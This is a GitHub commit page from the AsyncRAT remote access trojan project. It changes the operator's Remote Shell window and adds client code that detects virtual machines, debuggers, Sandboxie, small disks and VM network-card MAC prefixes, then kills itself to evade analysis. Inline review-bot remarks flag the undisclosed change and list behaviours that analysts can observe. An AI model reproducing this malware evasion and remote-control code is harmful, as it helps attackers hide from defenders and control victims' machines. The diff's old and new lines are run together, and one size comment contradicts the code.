Merge pull request #31 from MrDevBot/master

UI changes to the Remote Shell
NYAN CAT 2019-05-21 15:51:14 +03:00 committed by GitHub
commit 3b4bd0dc05
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 788 additions and 704 deletions


@ -28,67 +28,100 @@
/// </summary> /// </summary>
private void InitializeComponent() private void InitializeComponent()
{ {
this.components = new System.ComponentModel.Container(); this.components = new System.ComponentModel.Container();
System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell)); System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(FormShell));
this.richTextBox1 = new System.Windows.Forms.RichTextBox(); this.richTextBox1 = new System.Windows.Forms.RichTextBox();
this.textBox1 = new System.Windows.Forms.TextBox(); this.textBox1 = new System.Windows.Forms.TextBox();
this.timer1 = new System.Windows.Forms.Timer(this.components); this.timer1 = new System.Windows.Forms.Timer(this.components);
this.SuspendLayout(); this.panel1 = new System.Windows.Forms.Panel();
// this.label1 = new System.Windows.Forms.Label();
// richTextBox1 this.panel1.SuspendLayout();
// this.SuspendLayout();
this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom) //
| System.Windows.Forms.AnchorStyles.Left) // richTextBox1
| System.Windows.Forms.AnchorStyles.Right))); //
this.richTextBox1.BackColor = System.Drawing.SystemColors.ControlText; this.richTextBox1.Anchor = ((System.Windows.Forms.AnchorStyles)((((System.Windows.Forms.AnchorStyles.Top | System.Windows.Forms.AnchorStyles.Bottom)
this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None; | System.Windows.Forms.AnchorStyles.Left)
this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); | System.Windows.Forms.AnchorStyles.Right)));
this.richTextBox1.ForeColor = System.Drawing.Color.White; this.richTextBox1.BackColor = System.Drawing.Color.White;
this.richTextBox1.Location = new System.Drawing.Point(0, 0); this.richTextBox1.BorderStyle = System.Windows.Forms.BorderStyle.None;
this.richTextBox1.Name = "richTextBox1"; this.richTextBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.richTextBox1.ReadOnly = true; this.richTextBox1.ForeColor = System.Drawing.SystemColors.ControlText;
this.richTextBox1.Size = new System.Drawing.Size(800, 398); this.richTextBox1.Location = new System.Drawing.Point(0, 0);
this.richTextBox1.TabIndex = 0; this.richTextBox1.Margin = new System.Windows.Forms.Padding(2);
this.richTextBox1.Text = ""; this.richTextBox1.Name = "richTextBox1";
// this.richTextBox1.ReadOnly = true;
// textBox1 this.richTextBox1.Size = new System.Drawing.Size(533, 268);
// this.richTextBox1.TabIndex = 0;
this.textBox1.BackColor = System.Drawing.SystemColors.ControlText; this.richTextBox1.Text = "";
this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom; //
this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0))); // textBox1
this.textBox1.ForeColor = System.Drawing.Color.White; //
this.textBox1.Location = new System.Drawing.Point(0, 424); this.textBox1.BackColor = System.Drawing.SystemColors.Window;
this.textBox1.Name = "textBox1"; this.textBox1.Dock = System.Windows.Forms.DockStyle.Bottom;
this.textBox1.Size = new System.Drawing.Size(800, 26); this.textBox1.Font = new System.Drawing.Font("Consolas", 8F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
this.textBox1.TabIndex = 1; this.textBox1.ForeColor = System.Drawing.SystemColors.ControlText;
this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown); this.textBox1.Location = new System.Drawing.Point(69, 272);
// this.textBox1.Margin = new System.Windows.Forms.Padding(2);
// timer1 this.textBox1.Name = "textBox1";
// this.textBox1.Size = new System.Drawing.Size(464, 20);
this.timer1.Enabled = true; this.textBox1.TabIndex = 1;
this.timer1.Interval = 1000; this.textBox1.KeyDown += new System.Windows.Forms.KeyEventHandler(this.TextBox1_KeyDown);
this.timer1.Tick += new System.EventHandler(this.Timer1_Tick); //
// // timer1
// FormShell //
// this.timer1.Enabled = true;
this.AutoScaleDimensions = new System.Drawing.SizeF(9F, 20F); this.timer1.Interval = 1000;
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.timer1.Tick += new System.EventHandler(this.Timer1_Tick);
this.BackColor = System.Drawing.SystemColors.ControlText; //
this.ClientSize = new System.Drawing.Size(800, 450); // panel1
this.Controls.Add(this.textBox1); //
this.Controls.Add(this.richTextBox1); this.panel1.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(64)))), ((int)(((byte)(64)))), ((int)(((byte)(64)))));
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon"))); this.panel1.Controls.Add(this.label1);
this.Name = "FormShell"; this.panel1.Dock = System.Windows.Forms.DockStyle.Left;
this.Text = "FormShell"; this.panel1.Location = new System.Drawing.Point(0, 0);
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed); this.panel1.Name = "panel1";
this.ResumeLayout(false); this.panel1.Size = new System.Drawing.Size(69, 292);
this.PerformLayout(); this.panel1.TabIndex = 2;
//
// label1
//
this.label1.AutoSize = true;
this.label1.ForeColor = System.Drawing.SystemColors.ActiveCaption;
this.label1.Location = new System.Drawing.Point(6, 274);
this.label1.Name = "label1";
this.label1.Size = new System.Drawing.Size(60, 13);
this.label1.TabIndex = 0;
this.label1.Text = "Command :";
this.label1.Click += new System.EventHandler(this.Label1_Click);
//
// FormShell
//
this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font;
this.BackColor = System.Drawing.Color.FromArgb(((int)(((byte)(64)))), ((int)(((byte)(64)))), ((int)(((byte)(64)))));
this.ClientSize = new System.Drawing.Size(533, 292);
this.Controls.Add(this.richTextBox1);
this.Controls.Add(this.textBox1);
this.Controls.Add(this.panel1);
this.Icon = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
this.Margin = new System.Windows.Forms.Padding(2);
this.Name = "FormShell";
this.Text = "Remote Shell";
this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.FormShell_FormClosed);
this.Load += new System.EventHandler(this.FormShell_Load);
this.panel1.ResumeLayout(false);
this.panel1.PerformLayout();
this.ResumeLayout(false);
this.PerformLayout();
} }
#endregion #endregion
private System.Windows.Forms.TextBox textBox1; private System.Windows.Forms.TextBox textBox1;
public System.Windows.Forms.RichTextBox richTextBox1; public System.Windows.Forms.RichTextBox richTextBox1;
private System.Windows.Forms.Timer timer1; private System.Windows.Forms.Timer timer1;
private System.Windows.Forms.Panel panel1;
private System.Windows.Forms.Label label1;
} }
} }


@ -4,6 +4,7 @@ using System;
using System.Collections.Generic; using System.Collections.Generic;
using System.ComponentModel; using System.ComponentModel;
using System.Data; using System.Data;
using System.Diagnostics;
using System.Drawing; using System.Drawing;
using System.Linq; using System.Linq;
using System.Text; using System.Text;
@ -56,6 +57,16 @@ namespace AsyncRAT_Sharp.Forms
private void Timer1_Tick(object sender, EventArgs e) private void Timer1_Tick(object sender, EventArgs e)
{ {
if (!C.ClientSocket.Connected) this.Close(); if (!C.ClientSocket.Connected) this.Close();
} }
private void FormShell_Load(object sender, EventArgs e)
{
}
private void Label1_Click(object sender, EventArgs e)
{
Process.Start("https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/windows-commands");
}
} }
} }
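Review bot: `FormShell_Load` is added with an empty body, so the `Load` subscription added in the designer section wires up a handler that does nothing; remove both, or add a comment such as `// intentionally empty: reserved for designer` if it has to stay. `Label1_Click` hands a URL straight to `Process.Start` with no handling for the `Win32Exception` raised when no application is registered for the scheme. A plain `Label` captioned "Command :" also gives no visual hint that clicking it opens a browser; a `LinkLabel` would make that behaviour explicit. The class body starts outside this hunk.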

File diff suppressed because it is too large Load Diff


@ -1,67 +1,136 @@
using System; using System;
using System.Diagnostics; using System.Diagnostics;
using System.Management; using System.Linq;
using System.Runtime.InteropServices; using System.Management;
using System.Net.NetworkInformation;
// │ Author : NYAN CAT using System.Runtime.InteropServices;
// │ Name : Anti Analysis v0.2
// │ Contact : https://github.com/NYAN-x-CAT // │ Author : NYAN CAT
// │ Name : Anti Analysis v0.2
// This program is distributed for educational purposes only. // │ Contact : https://github.com/NYAN-x-CAT
// This program is distributed for educational purposes only.
namespace Client.Helper
{
class Anti_Analysis
{ namespace Client.Helper
public static void RunAntiAnalysis() {
{
if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie()) class Anti_Analysis
Environment.FailFast(null); {
} private static long GB_50 = 50000000000;
public static void RunAntiAnalysis()
private static bool DetectVirtualMachine() {
{ if (DetectVirtualMachine() || DetectDebugger() || DetectSandboxie())
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem")) Environment.FailFast(null);
{ }
using (var items = searcher.Get())
{ internal static bool SmallHDD()
foreach (var item in items) {
{
string manufacturer = item["Manufacturer"].ToString().ToLower(); // Method One - main drive smaller than 50gb, likely a VM
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL")) long driveSize = Methods.GetMainDriveSize();
|| manufacturer.Contains("vmware") if (driveSize <= GB_50 * 2)
|| item["Model"].ToString() == "VirtualBox") return true;
{
return true; // Method Two - has common card of virtual machine
} //if (HasVMCard())
} //return true;
}
} // Method Three - checks for vm drivers
return false; if (HasVBOXDriver())
} return true;
private static bool DetectDebugger() // Method Four - if machine has been on for less than 5 mins
{ //if (GetUptime() < TimeSpan.FromMinutes(5))
bool isDebuggerPresent = false; //return true;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent; // Method Five - has VM mac address
} if (HasVMMac())
return true;
private static bool DetectSandboxie()
{ return false;
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0) }
return true; private static bool HasVMMac()
else {
return false; var macAddr =
} (
from nic in NetworkInterface.GetAllNetworkInterfaces()
where nic.OperationalStatus == OperationalStatus.Up
[DllImport("kernel32.dll")] select nic.GetPhysicalAddress().ToString()
public static extern IntPtr GetModuleHandle(string lpModuleName); ).FirstOrDefault();
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] var macs = new[]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent); {
} "00-05-69",
} "00:05:69",
"000569",
"00-50-56",
"00:50:56",
"005056",
"00-0C-29",
"00:0C:29",
"000C29",
"00-1C-14",
"00:1C:14",
"001C14",
"08-00-27",
"08:00:27",
"080027",
};
foreach (string mac in macs)
{
if (mac == macAddr)
return true;
}
return false;
}
private static bool DetectVirtualMachine()
{
using (var searcher = new ManagementObjectSearcher("Select * from Win32_ComputerSystem"))
{
using (var items = searcher.Get())
{
foreach (var item in items)
{
string manufacturer = item["Manufacturer"].ToString().ToLower();
if ((manufacturer == "microsoft corporation" && item["Model"].ToString().ToUpperInvariant().Contains("VIRTUAL"))
|| manufacturer.Contains("vmware")
|| item["Model"].ToString() == "VirtualBox")
{
return true;
}
}
}
}
return false;
}
private static bool DetectDebugger()
{
bool isDebuggerPresent = false;
CheckRemoteDebuggerPresent(Process.GetCurrentProcess().Handle, ref isDebuggerPresent);
return isDebuggerPresent;
}
private static bool DetectSandboxie()
{
if (GetModuleHandle("SbieDll.dll").ToInt32() != 0)
return true;
else
return false;
}
[DllImport("kernel32.dll")]
public static extern IntPtr GetModuleHandle(string lpModuleName);
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
static extern bool CheckRemoteDebuggerPresent(IntPtr hProcess, ref bool isDebuggerPresent);
}
}
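Review bot: The pull request is described as a UI change to the Remote Shell, yet this section adds environment-inspection code to the client helper (`GB_50`, `SmallHDD`, `HasVMMac`, plus new `System.Linq` and `System.Net.NetworkInformation` usings) that the description never mentions. A reviewer approving on the title alone would miss it, so it belongs in a separately described change. For analysts examining builds that include this file, the behaviours visible here are observable at runtime: the WMI query `Select * from Win32_ComputerSystem`, `CheckRemoteDebuggerPresent` on the current process, `GetModuleHandle("SbieDll.dll")`, enumeration through `NetworkInterface.GetAllNetworkInterfaces()`, and termination via `Environment.FailFast(null)`. `Methods.GetMainDriveSize` and `HasVBOXDriver` are referenced but not defined in this section, so what they touch cannot be judged from this page.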